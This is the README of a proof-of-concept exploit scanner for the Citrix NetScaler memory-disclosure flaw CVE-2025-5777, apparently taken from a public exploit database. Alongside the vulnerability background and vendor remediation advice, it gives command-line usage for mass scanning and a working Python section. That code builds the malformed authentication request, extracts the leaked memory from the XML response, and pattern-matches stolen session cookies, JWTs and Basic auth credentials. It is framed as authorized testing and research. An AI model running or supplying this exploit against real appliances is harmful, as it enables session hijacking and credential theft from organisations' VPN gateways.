Source: https://sploitus.com/exploit?id=1A52989F-8030-5C71-AC47-2D29A2303CF0
# CitrixBleed2 - CVE-2025-5777 PoC Scanner

This repository contains a Proof of Concept (PoC) scanner for **CVE-2025-5777**, dubbed **CitrixBleed2**, an out-of-bounds read (memory disclosure) vulnerability affecting Citrix NetScaler ADC and NetScaler Gateway.

Developed by **Guilherme Nocera** ([@nocerainfosec](https://twitter.com/nocerainfosec)), this tool is based on research originally published by WatchTowr Labs, with additional extraction logic for sensitive artifacts in the leaked memory and evidence logging for each finding.

> **Disclaimer**: This tool is provided for **educational and authorized testing** purposes only. Unauthorized use against systems you do not own or have explicit permission to test is illegal.

---

## 🩸 About the Vulnerability - CVE-2025-5777

**CVE-2025-5777** is a memory disclosure vulnerability in **Citrix NetScaler ADC and Gateway**. The appliance is exposed when it is configured as a Gateway (VPN virtual server, ICA proxy, CVPN, RDP Proxy) or as an AAA virtual server.

By sending specially crafted HTTP POST requests to the authentication endpoint, an unauthenticated attacker can trigger an over-read: the response echoes back uninitialized process memory, which can contain session tokens and other data from previous requests. The request is cheap to repeat, so an attacker can harvest memory continuously.

This issue is a follow-up to the original "CitrixBleed" (CVE-2023-4966). Citrix published its advisory in June 2025, and the public technical analysis by WatchTowr Labs followed in July 2025.

### Technical Summary:

* **Vulnerable Endpoint:** `/p/u/doAuthentication.do`
* **Attack Vector:** Network (unauthenticated, no user interaction)
* **Impact:** Disclosure of memory content (confidentiality only; no write primitive)
* **CVSS Score:** 7.5 (High) under the NVD CVSS v3.1 vector; Citrix rates it 9.3 under CVSS v4.0
* **Vendor Bulletin:** Citrix CTX693420. After upgrading, terminate active ICA and PCoIP sessions (`kill icaconnection -all` and `kill pcoipConnection -all`), because session tokens already leaked remain valid until the sessions are killed
* **Disclosure Source:** [WatchTowr Labs](https://labs.watchtowr.com/how-much-more-must-we-bleed-citrix-netscaler-memory-disclosure-citrixbleed-2-cve-2025-5777/)

The original discovery and in-depth analysis were conducted by the WatchTowr Labs research team. This PoC was inspired by their publication and enhanced for extended detection, evidence logging, and memory analysis by **Guilherme Nocera / Nocera Infosec**.

---

## 🚀 Features

* Exploits the CVE-2025-5777 (CitrixBleed2) memory disclosure vulnerability
* Collects leaked memory content via crafted `POST /p/u/doAuthentication.do` requests
* Extracts sensitive data like:

  * Session cookies
  * Tokens
  * Basic Auth headers
  * Passwords and JWTs
* Displays and logs TLS certificate metadata (subject, issuer, validity)
* Automatically redacts known branding strings of specific organizations from the saved output (vendor and customer names are stripped before logging)
* Saves leaks with a timestamped output file to prevent overwrites

---

## 🧪 Usage

### Single Target

```bash
python3 cve-2025-5777.py -t <target> -r 5 -T 5 -v
```

### List of Targets

```bash
python3 cve-2025-5777.py -l targets.txt -r 3 -T 10
```

### Output File Customization

```bash
python3 cve-2025-5777.py -t <target> -o custom_output.txt
```

If `-o` is not specified, a timestamped file is created automatically (e.g., `citrix_leaks_20250705_154312.txt`).

---

## 🧠 Detection Technique

The tool sends a malformed authentication request to:

```
POST /p/u/doAuthentication.do HTTP/1.0
```

The body is a short payload (the bare `login` parameter name, sent with no `=` and no value, as described in the WatchTowr analysis) together with a fixed `User-Agent`. Because no value was supplied, the appliance echoes uninitialized memory back in the `login` field of its XML response, inside the `<InitialValue>` element. Each response exposes only a bounded chunk (roughly 127 bytes), which is why the tool repeats the request (`-r`) and accumulates the leaked fragments.

It parses each raw response for high-entropy data, certificate metadata, and sensitive content (session cookies, tokens, Basic Auth headers, passwords, JWTs) via regex. The expected baseline from a fixed build is an empty `<InitialValue></InitialValue>`; any non-empty value returned for a request that sent none is evidence of the leak.
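The request construction and response parsing described above, as an added example written for this page and not taken from the scanner itself. The `<InitialValue>` location of the echoed value follows the public analysis; the sample response, the fixed-build heuristic (any non-empty value counts as a leak), the secret patterns and the hostname are assumptions for illustration:

```python
import math
import re
from collections import Counter
from typing import Dict, List

# Endpoint named in the advisory and in this README.
TARGET_PATH = "/p/u/doAuthentication.do"


def build_request(host: str) -> bytes:
    """Return the raw HTTP/1.0 request that triggers the over-read.

    The body is the bare parameter name ``login`` with no ``=`` and no value.
    The public analysis reports that this leaves the echoed ``login`` field
    uninitialised, so stale memory is copied into <InitialValue>.
    """
    body = b"login"
    head = (
        f"POST {TARGET_PATH} HTTP/1.0\r\n"
        f"Host: {host}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n"
        "Connection: close\r\n\r\n"
    )
    return head.encode() + body


INITIAL_VALUE_RE = re.compile(rb"<InitialValue>(.*?)</InitialValue>", re.DOTALL)


def extract_leak(response: bytes) -> bytes:
    """Pull the echoed <InitialValue> bytes out of a raw XML response."""
    m = INITIAL_VALUE_RE.search(response)
    return m.group(1) if m else b""


def looks_vulnerable(response: bytes) -> bool:
    """Heuristic (assumption, confirm against a known-patched build):
    we sent no value, so any non-empty <InitialValue> is leaked memory."""
    return len(extract_leak(response)) > 0


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; raw memory tends to score higher than plain text."""
    if not data:
        return 0.0
    counts = Counter(data)
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


# Patterns for artefacts worth flagging. NSC_AAAC is the NetScaler AAA session
# cookie name; the other two are generic token shapes (assumed, not exhaustive).
SECRET_PATTERNS: Dict[str, re.Pattern] = {
    "netscaler_session_cookie": re.compile(rb"NSC_AAAC=([A-Za-z0-9+/=_-]{16,})"),
    "jwt": re.compile(rb"eyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+"),
    "basic_auth": re.compile(rb"Basic\s+([A-Za-z0-9+/=]{8,})"),
}


def find_secrets(leak: bytes) -> Dict[str, List[str]]:
    """Run every pattern over the leak and return matches grouped by category."""
    hits: Dict[str, List[str]] = {}
    for name, pat in SECRET_PATTERNS.items():
        found = [m.group(0).decode("latin-1") for m in pat.finditer(leak)]
        if found:
            hits[name] = found
    return hits


# Constructed sample response (not captured from any appliance): the
# <InitialValue> is stuffed with a fake session cookie, a fake Basic header,
# a fake JWT and binary filler, mimicking what an over-read echoes back.
SAMPLE_LEAK = (
    b"\x00\x00\x7f\x10NSC_AAAC=d3d3c2xhc3RlcmFiY2RlZmdoaWprbG1ub3A=;"
    b"\x01\x02Authorization: Basic dXNlcjpwYXNzd29yZA==\r\n"
    b"eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ0ZXN0In0.abc123_-XYZ\xff\xfe"
)
SAMPLE_RESPONSE = (
    b"HTTP/1.0 200 OK\r\nContent-Type: text/xml\r\n\r\n"
    b'<?xml version="1.0" encoding="UTF-8"?><AuthenticateResponse>'
    b"<Requirements><Requirement><Credential><ID>login</ID></Credential>"
    b"<Input><Text><InitialValue>" + SAMPLE_LEAK + b"</InitialValue></Text>"
    b"</Input></Requirement></Requirements></AuthenticateResponse>"
)
# Same response with the element empty, as a fixed build is expected to answer.
PATCHED_RESPONSE = SAMPLE_RESPONSE.replace(SAMPLE_LEAK, b"")


def analyse(response: bytes) -> Dict[str, object]:
    """One-shot summary for a single response, in the shape a scanner would log."""
    leak = extract_leak(response)
    return {
        "vulnerable": looks_vulnerable(response),
        "leak_len": len(leak),
        "entropy": round(shannon_entropy(leak), 2),
        "secrets": find_secrets(leak),
    }


if __name__ == "__main__":
    print(build_request("gateway.example.invalid").decode())
    print(analyse(SAMPLE_RESPONSE))
    print(analyse(PATCHED_RESPONSE))
```

Sending `build_request()` over TLS to a real appliance and feeding the reply to `analyse()` is the whole scan loop; in practice the request is repeated many times and the leaks concatenated, since each response only yields a small fragment.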

---

## 🛡 Legal Notice

* This tool must only be used in **authorized** penetration testing or **controlled environments**.
* All users are solely responsible for ensuring legal and ethical use.

---

## 🙏 Credits

* **Original discovery and writeup**: [WatchTowr Labs](https://labs.watchtowr.com/how-much-more-must-we-bleed-citrix-netscaler-memory-disclosure-citrixbleed-2-cve-2025-5777/)
* **Enhanced PoC author**: Guilherme Nocera ([@nocerainfosec](https://twitter.com/nocerainfosec))
* Based on open-source research and crafted for Brazilian and global security professionals.

---

## 📎 Related

* [NVD entry - CVE-2025-5777](https://nvd.nist.gov/vuln/detail/CVE-2025-5777)
* [Citrix security advisories](https://www.citrix.com/support/security-bulletins.html)
* [WatchTowr Labs Article](https://labs.watchtowr.com/how-much-more-must-we-bleed-citrix-netscaler-memory-disclosure-citrixbleed-2-cve-2025-5777/)

---

## 📜 License

This repository is released under the MIT License. See `LICENSE` for details.

Stay secure. Test responsibly.